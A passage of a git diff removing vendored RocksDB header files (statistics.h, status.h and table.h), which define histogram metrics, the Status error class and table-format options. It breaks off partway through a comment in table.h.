-  MANIFEST_FILE_SYNC_MICROS,
-  // TIME SPENT IN IO DURING TABLE OPEN
-  TABLE_OPEN_IO_MICROS,
-  DB_MULTIGET,
-  READ_BLOCK_COMPACTION_MICROS,
-  READ_BLOCK_GET_MICROS,
-  WRITE_RAW_BLOCK_MICROS,
-  STALL_L0_SLOWDOWN_COUNT,
-  STALL_MEMTABLE_COMPACTION_COUNT,
-  STALL_L0_NUM_FILES_COUNT,
-  HARD_RATE_LIMIT_DELAY_COUNT,
-  SOFT_RATE_LIMIT_DELAY_COUNT,
-  NUM_FILES_IN_SINGLE_COMPACTION,
-  DB_SEEK,
-  WRITE_STALL,
-  SST_READ_MICROS,
-  // The number of subcompactions actually scheduled during a compaction
-  NUM_SUBCOMPACTIONS_SCHEDULED,
-  // Value size distribution in each operation
-  BYTES_PER_READ,
-  BYTES_PER_WRITE,
-  BYTES_PER_MULTIGET,
-
-  // number of bytes compressed/decompressed
-  // number of bytes is when uncompressed; i.e. before/after respectively
-  BYTES_COMPRESSED,
-  BYTES_DECOMPRESSED,
-  COMPRESSION_TIMES_NANOS,
-  DECOMPRESSION_TIMES_NANOS,
-  // Number of merge operands passed to the merge operator in user read
-  // requests.
-  READ_NUM_MERGE_OPERANDS,
-
-  HISTOGRAM_ENUM_MAX,  // TODO(ldemailly): enforce HistogramsNameMap match
-};
-
-const std::vector<std::pair<Histograms, std::string>> HistogramsNameMap = {
-    {DB_GET, "rocksdb.db.get.micros"},
-    {DB_WRITE, "rocksdb.db.write.micros"},
-    {COMPACTION_TIME, "rocksdb.compaction.times.micros"},
-    {SUBCOMPACTION_SETUP_TIME, "rocksdb.subcompaction.setup.times.micros"},
-    {TABLE_SYNC_MICROS, "rocksdb.table.sync.micros"},
-    {COMPACTION_OUTFILE_SYNC_MICROS, "rocksdb.compaction.outfile.sync.micros"},
-    {WAL_FILE_SYNC_MICROS, "rocksdb.wal.file.sync.micros"},
-    {MANIFEST_FILE_SYNC_MICROS, "rocksdb.manifest.file.sync.micros"},
-    {TABLE_OPEN_IO_MICROS, "rocksdb.table.open.io.micros"},
-    {DB_MULTIGET, "rocksdb.db.multiget.micros"},
-    {READ_BLOCK_COMPACTION_MICROS, "rocksdb.read.block.compaction.micros"},
-    {READ_BLOCK_GET_MICROS, "rocksdb.read.block.get.micros"},
-    {WRITE_RAW_BLOCK_MICROS, "rocksdb.write.raw.block.micros"},
-    {STALL_L0_SLOWDOWN_COUNT, "rocksdb.l0.slowdown.count"},
-    {STALL_MEMTABLE_COMPACTION_COUNT, "rocksdb.memtable.compaction.count"},
-    {STALL_L0_NUM_FILES_COUNT, "rocksdb.num.files.stall.count"},
-    {HARD_RATE_LIMIT_DELAY_COUNT, "rocksdb.hard.rate.limit.delay.count"},
-    {SOFT_RATE_LIMIT_DELAY_COUNT, "rocksdb.soft.rate.limit.delay.count"},
-    {NUM_FILES_IN_SINGLE_COMPACTION, "rocksdb.numfiles.in.singlecompaction"},
-    {DB_SEEK, "rocksdb.db.seek.micros"},
-    {WRITE_STALL, "rocksdb.db.write.stall"},
-    {SST_READ_MICROS, "rocksdb.sst.read.micros"},
-    {NUM_SUBCOMPACTIONS_SCHEDULED, "rocksdb.num.subcompactions.scheduled"},
-    {BYTES_PER_READ, "rocksdb.bytes.per.read"},
-    {BYTES_PER_WRITE, "rocksdb.bytes.per.write"},
-    {BYTES_PER_MULTIGET, "rocksdb.bytes.per.multiget"},
-    {BYTES_COMPRESSED, "rocksdb.bytes.compressed"},
-    {BYTES_DECOMPRESSED, "rocksdb.bytes.decompressed"},
-    {COMPRESSION_TIMES_NANOS, "rocksdb.compression.times.nanos"},
-    {DECOMPRESSION_TIMES_NANOS, "rocksdb.decompression.times.nanos"},
-    {READ_NUM_MERGE_OPERANDS, "rocksdb.read.num.merge_operands"},
-};
-
-struct HistogramData {
-  double median;
-  double percentile95;
-  double percentile99;
-  double average;
-  double standard_deviation;
-  // zero-initialize new members since old Statistics::histogramData()
-  // implementations won't write them.
-  double max = 0.0;
-};
-
-enum StatsLevel {
-  // Collect all stats except time inside mutex lock AND time spent on
-  // compression.
-  kExceptDetailedTimers,
-  // Collect all stats except the counters requiring to get time inside the
-  // mutex lock.
-  kExceptTimeForMutex,
-  // Collect all stats, including measuring duration of mutex operations.
-  // If getting time is expensive on the platform to run, it can
-  // reduce scalability to more threads, especially for writes.
-  kAll,
-};
-
-// Analyze the performance of a db
-class Statistics {
- public:
-  virtual ~Statistics() {}
-
-  virtual uint64_t getTickerCount(uint32_t tickerType) const = 0;
-  virtual void histogramData(uint32_t type,
-                             HistogramData* const data) const = 0;
-  virtual std::string getHistogramString(uint32_t type) const { return ""; }
-  virtual void recordTick(uint32_t tickerType, uint64_t count = 0) = 0;
-  virtual void setTickerCount(uint32_t tickerType, uint64_t count) = 0;
-  virtual uint64_t getAndResetTickerCount(uint32_t tickerType) = 0;
-  virtual void measureTime(uint32_t histogramType, uint64_t time) = 0;
-
-  // Resets all ticker and histogram stats
-  virtual Status Reset() {
-    return Status::NotSupported("Not implemented");
-  }
-
-  // String representation of the statistic object.
-  virtual std::string ToString() const {
-    // Do nothing by default
-    return std::string("ToString(): not implemented");
-  }
-
-  // Override this function to disable particular histogram collection
-  virtual bool HistEnabledForType(uint32_t type) const {
-    return type < HISTOGRAM_ENUM_MAX;
-  }
-
-  StatsLevel stats_level_ = kExceptDetailedTimers;
-};
-
-// Create a concrete DBStatistics object
-std::shared_ptr<Statistics> CreateDBStatistics();
-
-}  // namespace rocksdb
-
-#endif  // STORAGE_ROCKSDB_INCLUDE_STATISTICS_H_
diff --git a/thirdparty/rocksdb/include/rocksdb/status.h b/thirdparty/rocksdb/include/rocksdb/status.h
deleted file mode 100644
index 709f383..0000000
--- a/thirdparty/rocksdb/include/rocksdb/status.h
+++ /dev/null
@@ -1,316 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-// A Status encapsulates the result of an operation.  It may indicate success,
-// or it may indicate an error with an associated error message.
-//
-// Multiple threads can invoke const methods on a Status without
-// external synchronization, but if any of the threads may call a
-// non-const method, all threads accessing the same Status must use
-// external synchronization.
-
-#ifndef STORAGE_ROCKSDB_INCLUDE_STATUS_H_
-#define STORAGE_ROCKSDB_INCLUDE_STATUS_H_
-
-#include <string>
-#include "rocksdb/slice.h"
-
-namespace rocksdb {
-
-class Status {
- public:
-  // Create a success status.
-  Status() : code_(kOk), subcode_(kNone), state_(nullptr) {}
-  ~Status() { delete[] state_; }
-
-  // Copy the specified status.
-  Status(const Status& s);
-  Status& operator=(const Status& s);
-  Status(Status&& s)
-#if !(defined _MSC_VER) || ((defined _MSC_VER) && (_MSC_VER >= 1900))
-      noexcept
-#endif
-      ;
-  Status& operator=(Status&& s)
-#if !(defined _MSC_VER) || ((defined _MSC_VER) && (_MSC_VER >= 1900))
-      noexcept
-#endif
-      ;
-  bool operator==(const Status& rhs) const;
-  bool operator!=(const Status& rhs) const;
-
-  enum Code {
-    kOk = 0,
-    kNotFound = 1,
-    kCorruption = 2,
-    kNotSupported = 3,
-    kInvalidArgument = 4,
-    kIOError = 5,
-    kMergeInProgress = 6,
-    kIncomplete = 7,
-    kShutdownInProgress = 8,
-    kTimedOut = 9,
-    kAborted = 10,
-    kBusy = 11,
-    kExpired = 12,
-    kTryAgain = 13
-  };
-
-  Code code() const { return code_; }
-
-  enum SubCode {
-    kNone = 0,
-    kMutexTimeout = 1,
-    kLockTimeout = 2,
-    kLockLimit = 3,
-    kNoSpace = 4,
-    kDeadlock = 5,
-    kStaleFile = 6,
-    kMemoryLimit = 7,
-    kMaxSubCode
-  };
-
-  SubCode subcode() const { return subcode_; }
-
-  // Returns a C style string indicating the message of the Status
-  const char* getState() const { return state_; }
-
-  // Return a success status.
-  static Status OK() { return Status(); }
-
-  // Return error status of an appropriate type.
-  static Status NotFound(const Slice& msg, const Slice& msg2 = Slice()) {
-    return Status(kNotFound, msg, msg2);
-  }
-  // Fast path for not found without malloc;
-  static Status NotFound(SubCode msg = kNone) { return Status(kNotFound, msg); }
-
-  static Status Corruption(const Slice& msg, const Slice& msg2 = Slice()) {
-    return Status(kCorruption, msg, msg2);
-  }
-  static Status Corruption(SubCode msg = kNone) {
-    return Status(kCorruption, msg);
-  }
-
-  static Status NotSupported(const Slice& msg, const Slice& msg2 = Slice()) {
-    return Status(kNotSupported, msg, msg2);
-  }
-  static Status NotSupported(SubCode msg = kNone) {
-    return Status(kNotSupported, msg);
-  }
-
-  static Status InvalidArgument(const Slice& msg, const Slice& msg2 = Slice()) {
-    return Status(kInvalidArgument, msg, msg2);
-  }
-  static Status InvalidArgument(SubCode msg = kNone) {
-    return Status(kInvalidArgument, msg);
-  }
-
-  static Status IOError(const Slice& msg, const Slice& msg2 = Slice()) {
-    return Status(kIOError, msg, msg2);
-  }
-  static Status IOError(SubCode msg = kNone) { return Status(kIOError, msg); }
-
-  static Status MergeInProgress(const Slice& msg, const Slice& msg2 = Slice()) {
-    return Status(kMergeInProgress, msg, msg2);
-  }
-  static Status MergeInProgress(SubCode msg = kNone) {
-    return Status(kMergeInProgress, msg);
-  }
-
-  static Status Incomplete(const Slice& msg, const Slice& msg2 = Slice()) {
-    return Status(kIncomplete, msg, msg2);
-  }
-  static Status Incomplete(SubCode msg = kNone) {
-    return Status(kIncomplete, msg);
-  }
-
-  static Status ShutdownInProgress(SubCode msg = kNone) {
-    return Status(kShutdownInProgress, msg);
-  }
-  static Status ShutdownInProgress(const Slice& msg,
-                                   const Slice& msg2 = Slice()) {
-    return Status(kShutdownInProgress, msg, msg2);
-  }
-  static Status Aborted(SubCode msg = kNone) { return Status(kAborted, msg); }
-  static Status Aborted(const Slice& msg, const Slice& msg2 = Slice()) {
-    return Status(kAborted, msg, msg2);
-  }
-
-  static Status Busy(SubCode msg = kNone) { return Status(kBusy, msg); }
-  static Status Busy(const Slice& msg, const Slice& msg2 = Slice()) {
-    return Status(kBusy, msg, msg2);
-  }
-
-  static Status TimedOut(SubCode msg = kNone) { return Status(kTimedOut, msg); }
-  static Status TimedOut(const Slice& msg, const Slice& msg2 = Slice()) {
-    return Status(kTimedOut, msg, msg2);
-  }
-
-  static Status Expired(SubCode msg = kNone) { return Status(kExpired, msg); }
-  static Status Expired(const Slice& msg, const Slice& msg2 = Slice()) {
-    return Status(kExpired, msg, msg2);
-  }
-
-  static Status TryAgain(SubCode msg = kNone) { return Status(kTryAgain, msg); }
-  static Status TryAgain(const Slice& msg, const Slice& msg2 = Slice()) {
-    return Status(kTryAgain, msg, msg2);
-  }
-
-  static Status NoSpace() { return Status(kIOError, kNoSpace); }
-  static Status NoSpace(const Slice& msg, const Slice& msg2 = Slice()) {
-    return Status(kIOError, kNoSpace, msg, msg2);
-  }
-
-  static Status MemoryLimit() { return Status(kAborted, kMemoryLimit); }
-  static Status MemoryLimit(const Slice& msg, const Slice& msg2 = Slice()) {
-    return Status(kAborted, kMemoryLimit, msg, msg2);
-  }
-
-  // Returns true iff the status indicates success.
-  bool ok() const { return code() == kOk; }
-
-  // Returns true iff the status indicates a NotFound error.
-  bool IsNotFound() const { return code() == kNotFound; }
-
-  // Returns true iff the status indicates a Corruption error.
-  bool IsCorruption() const { return code() == kCorruption; }
-
-  // Returns true iff the status indicates a NotSupported error.
-  bool IsNotSupported() const { return code() == kNotSupported; }
-
-  // Returns true iff the status indicates an InvalidArgument error.
-  bool IsInvalidArgument() const { return code() == kInvalidArgument; }
-
-  // Returns true iff the status indicates an IOError.
-  bool IsIOError() const { return code() == kIOError; }
-
-  // Returns true iff the status indicates an MergeInProgress.
-  bool IsMergeInProgress() const { return code() == kMergeInProgress; }
-
-  // Returns true iff the status indicates Incomplete
-  bool IsIncomplete() const { return code() == kIncomplete; }
-
-  // Returns true iff the status indicates Shutdown In progress
-  bool IsShutdownInProgress() const { return code() == kShutdownInProgress; }
-
-  bool IsTimedOut() const { return code() == kTimedOut; }
-
-  bool IsAborted() const { return code() == kAborted; }
-
-  bool IsLockLimit() const {
-    return code() == kAborted && subcode() == kLockLimit;
-  }
-
-  // Returns true iff the status indicates that a resource is Busy and
-  // temporarily could not be acquired.
-  bool IsBusy() const { return code() == kBusy; }
-
-  bool IsDeadlock() const { return code() == kBusy && subcode() == kDeadlock; }
-
-  // Returns true iff the status indicated that the operation has Expired.
-  bool IsExpired() const { return code() == kExpired; }
-
-  // Returns true iff the status indicates a TryAgain error.
-  // This usually means that the operation failed, but may succeed if
-  // re-attempted.
-  bool IsTryAgain() const { return code() == kTryAgain; }
-
-  // Returns true iff the status indicates a NoSpace error
-  // This is caused by an I/O error returning the specific "out of space"
-  // error condition. Stricto sensu, an NoSpace error is an I/O error
-  // with a specific subcode, enabling users to take the appropriate action
-  // if needed
-  bool IsNoSpace() const {
-    return (code() == kIOError) && (subcode() == kNoSpace);
-  }
-
-  // Returns true iff the status indicates a memory limit error.  There may be
-  // cases where we limit the memory used in certain operations (eg. the size
-  // of a write batch) in order to avoid out of memory exceptions.
-  bool IsMemoryLimit() const {
-    return (code() == kAborted) && (subcode() == kMemoryLimit);
-  }
-
-  // Return a string representation of this status suitable for printing.
-  // Returns the string "OK" for success.
-  std::string ToString() const;
-
- private:
-  // A nullptr state_ (which is always the case for OK) means the message
-  // is empty.
-  // of the following form:
-  //    state_[0..3] == length of message
-  //    state_[4..]  == message
-  Code code_;
-  SubCode subcode_;
-  const char* state_;
-
-  static const char* msgs[static_cast<int>(kMaxSubCode)];
-
-  explicit Status(Code _code, SubCode _subcode = kNone)
-      : code_(_code), subcode_(_subcode), state_(nullptr) {}
-
-  Status(Code _code, SubCode _subcode, const Slice& msg, const Slice& msg2);
-  Status(Code _code, const Slice& msg, const Slice& msg2)
-      : Status(_code, kNone, msg, msg2) {}
-
-  static const char* CopyState(const char* s);
-};
-
-inline Status::Status(const Status& s) : code_(s.code_), subcode_(s.subcode_) {
-  state_ = (s.state_ == nullptr) ? nullptr : CopyState(s.state_);
-}
-inline Status& Status::operator=(const Status& s) {
-  // The following condition catches both aliasing (when this == &s),
-  // and the common case where both s and *this are ok.
-  if (this != &s) {
-    code_ = s.code_;
-    subcode_ = s.subcode_;
-    delete[] state_;
-    state_ = (s.state_ == nullptr) ? nullptr : CopyState(s.state_);
-  }
-  return *this;
-}
-
-inline Status::Status(Status&& s)
-#if !(defined _MSC_VER) || ((defined _MSC_VER) && (_MSC_VER >= 1900))
-    noexcept
-#endif
-    : Status() {
-  *this = std::move(s);
-}
-
-inline Status& Status::operator=(Status&& s)
-#if !(defined _MSC_VER) || ((defined _MSC_VER) && (_MSC_VER >= 1900))
-    noexcept
-#endif
-{
-  if (this != &s) {
-    code_ = std::move(s.code_);
-    s.code_ = kOk;
-    subcode_ = std::move(s.subcode_);
-    s.subcode_ = kNone;
-    delete[] state_;
-    state_ = nullptr;
-    std::swap(state_, s.state_);
-  }
-  return *this;
-}
-
-inline bool Status::operator==(const Status& rhs) const {
-  return (code_ == rhs.code_);
-}
-
-inline bool Status::operator!=(const Status& rhs) const {
-  return !(*this == rhs);
-}
-
-}  // namespace rocksdb
-
-#endif  // STORAGE_ROCKSDB_INCLUDE_STATUS_H_
diff --git a/thirdparty/rocksdb/include/rocksdb/table.h b/thirdparty/rocksdb/include/rocksdb/table.h
deleted file mode 100644
index 1b4c0ce..0000000
--- a/thirdparty/rocksdb/include/rocksdb/table.h
+++ /dev/null
@@ -1,513 +0,0 @@
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-// Currently we support two types of tables: plain table and block-based table.
-//   1. Block-based table: this is the default table type that we inherited from
-//      LevelDB, which was designed for storing data in hard disk or flash
-//      device.
-//   2. Plain table: it is one of RocksDB's SST file format optimized
-//      for low query latency on pure-memory or really low-latency media.
-//
-// A tutorial of rocksdb table formats is available here:
-//   https://github.com/facebook/rocksdb/wiki/A-Tutorial-of-RocksDB-SST-formats
-//
-// Example code is also available
-//   https://github.com/facebook/rocksdb/wiki/A-Tutorial-of-RocksDB-SST-formats#wiki-examples
-
-#pragma once
-#include <memory>
-#include <string>
-#include <unordered_map>
-
-#include "rocksdb/cache.h"
-#include "rocksdb/env.h"
-#include "rocksdb/iterator.h"
-#include "rocksdb/options.h"
-#include "rocksdb/status.h"
-
-namespace rocksdb {
-
-// -- Block-based Table
-class FlushBlockPolicyFactory;
-class PersistentCache;
-class RandomAccessFile;
-struct TableReaderOptions;
-struct TableBuilderOptions;
-class TableBuilder;
-class TableReader;
-class WritableFileWriter;
-struct EnvOptions;
-struct Options;
-
-using std::unique_ptr;
-
-enum ChecksumType : char {
-  kNoChecksum = 0x0,
-  kCRC32c = 0x1,
-  kxxHash = 0x2,
-};
-
-// For advanced user only
-struct BlockBasedTableOptions {
-  // @flush_block_policy_factory creates the instances of flush block policy.
-  // which provides a configurable way to determine when to flush a block in
-  // the block based tables.  If not set, table builder will use the default
-  // block flush policy, which cut blocks by block size (please refer to
-  // `FlushBlockBySizePolicy`).
-  std::shared_ptr<FlushBlockPolicyFactory> flush_block_policy_factory;
-
-  // TODO(kailiu) Temporarily disable this feature by making the default value
-  // to be false.
-  //
-  // Indicating if we'd put index/filter blocks to the block cache.
-  // If not specified, each "table reader" object will pre-load index/filter
-  // block during table initialization.
-  bool cache_index_and_filter_blocks = false;
-
-  // If cache_index_and_filter_blocks is enabled, cache index and filter
-  // blocks with high priority. If set to true, depending on implementation of
-  // block cache, index and filter blocks may be less likely to be evicted
-  // than data blocks.
-  bool cache_index_and_filter_blocks_with_high_priority = false;
-
-  // if cache_index_and_filter_blocks is true and the below is true, then
-  // filter and index blocks are stored in the cache, but a reference is
-  // held in the "table reader" object so the blocks are pinned and only
-  // evicted from cache when the table reader is freed.
-  bool pin_l0_filter_and_index_blocks_in_cache = false;
-
-  // The index type that will be used for this table.
-  enum IndexType : char {
-    // A space efficient index block that is optimized for
-    // binary-search-based index.
-    kBinarySearch,
-
-    // The hash index, if enabled, will do the hash lookup when
-    // `Options.prefix_extractor` is provided.
-    kHashSearch,
-
-    // TODO(myabandeh): this feature is in experimental phase and shall not be
-    // used in production; either remove the feature or remove this comment if
-    // it is ready to be used in production.
-    // A two-level index implementation. Both levels are binary search indexes.
-    kTwoLevelIndexSearch,
-  };
-
-  IndexType index_type = kBinarySearch;
-
-  // This option is now deprecated. No matter what value it is set to,
-  // it will behave as if hash_index_allow_collision=true.
-  bool hash_index_allow_collision = true;
-
-  // Use the specified checksum type. Newly created table files will be
-  // protected with this checksum type. Old table files will still be readable,
-  // even though they have different checksum type.
-  ChecksumType checksum = kCRC32c;
-
-  // Disable block cache. If this is set to true,
-  // then no block cache should be used, and the block_cache should
-  // point to a nullptr object.
-  bool no_block_cache = false;
-
-  // If non-NULL use the specified cache for blocks.
-  // If NULL, rocksdb will automatically create and use an 8MB internal cache.
-  std::shared_ptr<Cache> block_cache = nullptr;
-
-  // If non-NULL use the specified cache for pages read from device
-  // IF NULL, no page cache is used
-  std::shared_ptr<PersistentCache> persistent_cache = nullptr;
-
-  // If non-NULL use the specified cache for compressed blocks.
-  // If NULL, rocksdb will not use a compressed block cache.
-  std::shared_ptr<Cache> block_cache_compressed = nullptr;
-
-  // Approximate size of user data packed per block.  Note that the
-  // block size specified here corresponds to uncompressed data.  The
-  // actual size of the unit read from disk may be smaller if
-  // compression is enabled.  This parameter can be changed dynamically.
-  size_t block_size = 4 * 1024;
-
-  // This is used to close a block before it reaches the configured
-  // 'block_size'. If the percentage of free space in the current block is less
-  // than this specified number and adding a new record to the block will
-  // exceed the configured block size, then this block will be closed and the
-  // new record will be written to the next block.
-  int block_size_deviation = 10;
-
-  // Number of keys between restart points for delta encoding of keys.
-  // This parameter can be changed dynamically.  Most clients should
-  // leave this parameter alone.  The minimum value allowed is 1.  Any smaller
-  // value will be silently overwritten with 1.
-  int block_restart_interval = 16;
-
-  // Same as block_restart_interval but used for the index block.
-  int index_block_restart_interval = 1;
-
-  // Block size for partitioned metadata. Currently applied to indexes when
-  // kTwoLevelIndexSearch is used and to filters when partition_filters is used.
-  // Note: Since in the current implementation the filters and index partitions
-  // are aligned, an index/filter block is created when either index or filter
-  // block size reaches the specified limit.
-  // Note: this limit is currently applied to only index blocks; a filter
-  // partition is cut right after an index block is cut
-  // TODO(myabandeh): remove the note above when filter partitions are cut
-  // separately
-  uint64_t metadata_block_size = 4096;
-
-  // Note: currently this option requires kTwoLevelIndexSearch to be set as
-  // well.
-  // TODO(myabandeh): remove the note above once the limitation is lifted
-  // TODO(myabandeh): this feature is in experimental phase and shall not be
-  // used in production; either remove the feature or remove this comment if
-  // it is ready to be used in production.
-  // Use partitioned full filters for each SST file
-  bool partition_filters = false;
-
-  // Use delta encoding to compress keys in blocks.
-  // ReadOptions::pin_data requires this option to be disabled.
-  //
-  // Default: true
-  bool use_delta_encoding = true;
-
-  // If non-nullptr, use the specified filter policy to reduce disk reads.
-  // Many applications will benefit from passing the result of
-  // NewBloomFilterPolicy() here.
-  std::shared_ptr<const FilterPolicy> filter_policy = nullptr;
-
-  // If true, place whole keys in the filter (not just prefixes).
-  // This must generally be true for gets to be efficient.
-  bool whole_key_filtering = true;
-
-  // Verify that decompressing the compressed block gives back the input. This
-  // is a verification mode that we use to detect bugs in compression
-  // algorithms.
-  bool verify_compression = false;
-
-  // If used, For every data block we load into memory, we will create a bitmap
-  // of size ((block_size / `read_amp_bytes_per_bit`) / 8) bytes. This bitmap
-  // will be used to figure out the percentage we actually read of the blocks.
-  //
-  // When this feature is used Tickers::READ_AMP_ESTIMATE_USEFUL_BYTES and
-  // Tickers::READ_AMP_TOTAL_READ_BYTES can be used to calculate the
-  // read amplification using this formula
-  // (READ_AMP_TOTAL_READ_BYTES / READ_AMP_ESTIMATE_USEFUL_BYTES)
-  //
-  // value  =>  memory usage (percentage of loaded blocks memory)
-  // 1      =>  12.50 %
-  // 2      =>  06.25 %
-  // 4      =>  03.12 %
-  // 8      =>  01.56 %
-  // 16     =>  00.78 %
-  //
-  // Note: This number must be a power of 2, if not it will be sanitized
-  // to be the next lowest power of 2, for example a value of 7 will be
-  // treated as 4, a value of 19 will be treated as 16.
-  //
-  // Default: 0 (disabled)
-  uint32_t read_amp_bytes_per_bit = 0;
-
-  // We currently have three versions:
-  // 0 -- This version is currently written out by all RocksDB's versions by
-  // default.  Can be read by really old RocksDB's. Doesn't support changing
-  // checksum (default is CRC32).
-  // 1 -- Can be read by RocksDB's versions since 3.0. Supports non-default
-  // checksum, like xxHash. It is written by RocksDB when
-  // BlockBasedTableOptions::checksum is something other than kCRC32c. (version
-  // 0 is silently upconverted)
-  // 2 -- Can be read by RocksDB's versions since 3.10. Changes the way we
-  // encode compressed blocks with LZ4, BZip2 and Zlib compression. If you
-  // don't plan to run RocksDB before version 3.10, you should probably use
-  // this.
-  // This option only affects newly written tables. When reading exising tables,
-  // the information about version is read from the footer.
-  uint32_t format_version = 2;
-};
-
-// Table Properties that are specific to block-based table properties.
-struct BlockBasedTablePropertyNames {
-  // value of this propertis is a fixed int32 number.
-  static const std::string kIndexType;
-  // value is "1" for true and "0" for false.
-  static const std::string kWholeKeyFiltering;
-  // value is "1" for true and "0" for false.
-  static const std::string kPrefixFiltering;
-};
-
-// Create default block based table factory.
-extern TableFactory* NewBlockBasedTableFactory(
-    const BlockBasedTableOptions& table_options = BlockBasedTableOptions());
-
-#ifndef ROCKSDB_LITE
-
-enum EncodingType : char {
-  // Always write full keys without any special encoding.
-  kPlain,
-  // Find opportunity to write the same prefix once for multiple rows.
-  // In some cases, when a key follows a previous key with the same prefix,
-  // instead of writing out the full key, it just writes out the size of the
-  // shared prefix, as well as other bytes, to save some bytes.
-  //
-  // When using this option, the user is required to use the same prefix
-  // extractor to make sure the same prefix will be extracted from the same key.
-  // The Name() value of the prefix extractor will be stored in the file. When
-  // reopening the file, the name of the options.prefix_extractor given will be
-  // bitwise compared to the prefix extractors stored in the file. An error
-  // will be returned if the two don't match.
-  kPrefix,
-};
-
-// Table Properties that are specific to plain table properties.
-struct PlainTablePropertyNames {
-  static const std::string kEncodingType;
-  static const std::string kBloomVersion;
-  static const std::string kNumBloomBlocks;
-};
-
-const uint32_t kPlainTableVariableLength = 0;
-
-struct PlainTableOptions {
-  // @user_key_len: plain table has optimization for fix-sized keys, which can
-  //                be specified via user_key_len.  Alternatively, you can pass
-  //                `kPlainTableVariableLength` if your keys have variable
-  //                lengths.
-  uint32_t user_key_len = kPlainTableVariableLength;
-
-  // @bloom_bits_per_key: the number of bits used for bloom filer per prefix.
-  //                      You may disable it by passing a zero.
-  int bloom_bits_per_key = 10;
-
-  // @hash_table_ratio: the desired utilization of the hash table used for
-  //                    prefix hashing.
-  //                    hash_table_ratio = number of prefixes / #buckets in the
-  //                    hash table
-  double hash_table_ratio = 0.75;
-
-  // @index_sparseness: inside each prefix, need to build one index record for
-  //                    how many keys for binary search inside each hash bucket.
-  //                    For encoding type kPrefix, the value will be used when
-  //                    writing to determine an interval to rewrite the full
-  //                    key. It will also be used as a suggestion and satisfied
-  //                    when possible.
-  size_t index_sparseness = 16;
-
-  // @huge_page_tlb_size: if <=0, allocate hash indexes and blooms from malloc.
-  //                      Otherwise from huge page TLB. The user needs to
-  //                      reserve huge pages for it to be allocated, like:
-  //                          sysctl -w vm.nr_hugepages=20
-  //                      See linux doc Documentation/vm/hugetlbpage.txt
-  size_t huge_page_tlb_size = 0;
-
-  // @encoding_type: how to encode the keys. See enum EncodingType above for
-  //                 the choices. The value will determine how to encode keys
-  //                 when writing to a new SST file. This value will be stored
-  //                 inside the SST file which will be used when reading from
-  //                 the file, which makes it possible for users to choose
-  //                 different encoding type when reopening a DB. Files with
-  //                 different encoding types can co-exist in the same DB and
-  //                 can be read.
-  EncodingType encoding_type = kPlain;
-
-  // @full_scan_mode: mode for reading the whole file one record by one without
-  //                  using the index.
-  bool full_scan_mode = false;
-
-  // @store_index_in_file: compute plain table index and bloom filter during
-  //                       file building and store it in file. When reading
-  //                       file, index will be mmaped instead of recomputation.
-  bool store_index_in_file = false;
-};
-
-// -- Plain Table with prefix-only seek
-// For this factory, you need to set Options.prefix_extrator properly to make it
-// work. Look-up will starts with prefix hash lookup for key prefix. Inside the
-// hash bucket found, a binary search is executed for hash conflicts. Finally,
-// a linear search is used.
-
-extern TableFactory* NewPlainTableFactory(const PlainTableOptions& options =
-                                              PlainTableOptions());
-
-struct CuckooTablePropertyNames {
-  // The key that is used to fill empty buckets.
-  static const std::string kEmptyKey;
-  // Fixed length of value.
-  static const std::string kValueLength;
-  // Number of hash functions used in Cuckoo Hash.
-  static const std::string kNumHashFunc;
-  // It denotes the number of buckets in a Cuckoo Block. Given a key and a
-  // particular hash function, a Cuckoo Block is a set of consecutive buckets,
-  // where starting bucket id is given by the hash function on the key. In case
-  // of a collision during inserting the key, the builder tries to insert the
-  // key in other locations of the cuckoo block before using the next hash
-  // function. This reduces cache miss during read operation in case of
-  // collision.
-  static const std::string kCuckooBlockSize;
-  // Size of the hash table. Use this number to compute the modulo of hash
-  // function. The actual number of buckets will be kMaxHashTableSize +
-  // kCuckooBlockSize - 1. The last kCuckooBlockSize-1 buckets are used to
-  // accommodate the Cuckoo Block from end of hash table, due to cache friendly
-  // implementation.
-  static const std::string kHashTableSize;
-  // Denotes if the key sorted in the file is Internal Key (if false)
-  // or User Key only (if true).
-  static const std::string kIsLastLevel;
-  // Indicate if using identity function for the first hash function.
-  static const std::string kIdentityAsFirstHash;
-  // Indicate if using module or bit and to calculate hash value
-  static const std::string kUseModuleHash;
-  // Fixed user key length
-  static const std::string kUserKeyLength;
-};
-
-struct CuckooTableOptions {
-  // Determines the utilization of hash tables. Smaller values
-  // result in larger hash tables with fewer collisions.
-  double hash_table_ratio = 0.9;
-  // A property used by builder to determine the depth to go to
-  // to search for a path to displace elements in case of
-  // collision. See Builder.MakeSpaceForKey method. Higher
-  // values result in more efficient hash tables with fewer
-  // lookups but take more time to build.
-  uint32_t max_search_depth = 100;
-  // In case of collision while inserting, the builder
-  // attempts to insert in the next cuckoo_block_size
-  // locations before skipping over to the next Cuckoo hash
-  // function. This makes lookups more cache friendly in case
-  // of collisions.
-  uint32_t cuckoo_block_size = 5;
-  // If this option is enabled, user key is treated as uint64_t and its value
-  // is used as hash value directly. This option changes builder's behavior.
-  // Reader ignore this option and behave according to what specified in table
-  // property.
-  bool identity_as_first_hash = false;
-  // If this option is set to true, module is used during hash calculation.
-  // This often yields better space efficiency at the cost of performance.
-  // If this optino is set to false, # of entries in table is constrained to be
-  // power of two, and bit and is used to calculate hash, which is faster in
-  // general.
-  bool use_module_hash = true;
-};
-
-// Cuckoo Table Factory for SST table format using Cache Friendly Cuckoo Hashing
-extern TableFactory* NewCuckooTableFactory(
-    const CuckooTableOptions& table_options = CuckooTableOptions());
-
-#endif  // ROCKSDB_LITE
-
-class RandomAccessFileReader;
-
-// A base class for table factories.
-class TableFactory {
- public:
-  virtual ~TableFactory() {}
-
-  // The type of the table.
-  //
-  // The client of this package should switch to a new name whenever
-  // the table format implementation changes.
-  //
-  // Names starting with "rocksdb." are reserved and should not be used
-  // by any clients of this package.
-  virtual const char* Name() const = 0;
-
-  // Returns a Table object table that can fetch data from file specified
-  // in parameter file. It's the caller's responsibility to make sure
-  // file is in the correct format.
-  //
-  // NewTableReader() is called in three places:
-  // (1) TableCache::FindTable() calls the function when table cache miss
